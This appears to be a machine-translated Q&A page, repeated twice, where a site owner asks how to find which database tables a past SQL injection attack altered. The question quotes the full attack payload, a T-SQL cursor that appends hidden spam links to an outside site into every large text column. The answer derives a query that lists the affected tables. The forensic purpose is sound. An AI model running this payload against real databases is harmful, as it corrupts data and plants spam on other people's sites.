查找受 SQL 注入影响的表
Find the tables affected by SQL injection
最近,我们发现我们的一个 aspx 处理程序成为 sql 注入攻击的目标。使之成为可能的事实是,我们从索引 X 开始提取 url 的子字符串,直到 url 字符串结束,然后将其与数据库中的记录进行匹配,这使得攻击者很容易.
这是他们执行的注射示例:
;declare @c cursor;
declare @d varchar(4000);
set @c=cursor
for select
'update ['+TABLE_NAME+']
set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7
when 0 then ''''+char(60)+''div style="display:none"''+char(62)
+''are abortions safe ''
+char(60)+''a href="http:''+char(47)+char(47)
+''www.ooblong.com''+char(47)+''blog''+char(47)
+''template''+char(47)+''page''+char(47)+''abortion-clinics-nyc.aspx"''
+char(62)+case ABS(CHECKSUM(NewId()))%3
when 0 then ''reasons against abortion''
when 1 then ''pregnant abortion''
else ''pill for pregnancy termination'' end
+char(60)+char(47)+''a''+char(62)+'' how much does a abortion cost''
+char(60)+char(47)+''div''+char(62)+'''' else '''' end'
FROM sysindexes AS i
INNER JOIN sysobjects AS o
ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1)
and DATA_TYPE like '%varchar'
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin exec (@d);
fetch next from @c into @d;
end;
close @c--
我们已经确保我们的 aspx 处理程序能够拒绝此类请求。现在我们想找出哪些表受到了这次攻击的影响。我们发现至少有 2 张桌子受到影响,但恐怕还有更多。我们如何对上述 SQL 进行逆向工程以找出它影响了哪些表?
只需使用您显示的查询并删除所有不必要的关于攻击本身的细节,您将得到:
SELECT TABLE_NAME, COLUMN_NAME
FROM sysindexes AS i
INNER JOIN sysobjects AS o
ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1)
and DATA_TYPE like '%varchar'
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
游标中使用了此查询输出中的表和列,并受到您提到的攻击的影响。
最近,我们发现我们的一个 aspx 处理程序成为 sql 注入攻击的目标。使之成为可能的事实是,我们从索引 X 开始提取 url 的子字符串,直到 url 字符串结束,然后将其与数据库中的记录进行匹配,这使得攻击者很容易.
这是他们执行的注射示例:
;declare @c cursor;
declare @d varchar(4000);
set @c=cursor
for select
'update ['+TABLE_NAME+']
set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7
when 0 then ''''+char(60)+''div style="display:none"''+char(62)
+''are abortions safe ''
+char(60)+''a href="http:''+char(47)+char(47)
+''www.ooblong.com''+char(47)+''blog''+char(47)
+''template''+char(47)+''page''+char(47)+''abortion-clinics-nyc.aspx"''
+char(62)+case ABS(CHECKSUM(NewId()))%3
when 0 then ''reasons against abortion''
when 1 then ''pregnant abortion''
else ''pill for pregnancy termination'' end
+char(60)+char(47)+''a''+char(62)+'' how much does a abortion cost''
+char(60)+char(47)+''div''+char(62)+'''' else '''' end'
FROM sysindexes AS i
INNER JOIN sysobjects AS o
ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1)
and DATA_TYPE like '%varchar'
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin exec (@d);
fetch next from @c into @d;
end;
close @c--
我们已经确保我们的 aspx 处理程序能够拒绝此类请求。现在我们想找出哪些表受到了这次攻击的影响。我们发现至少有 2 张桌子受到影响,但恐怕还有更多。我们如何对上述 SQL 进行逆向工程以找出它影响了哪些表?
只需使用您显示的查询并删除所有不必要的关于攻击本身的细节,您将得到:
SELECT TABLE_NAME, COLUMN_NAME
FROM sysindexes AS i
INNER JOIN sysobjects AS o
ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1)
and DATA_TYPE like '%varchar'
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
游标中使用了此查询输出中的表和列,并受到您提到的攻击的影响。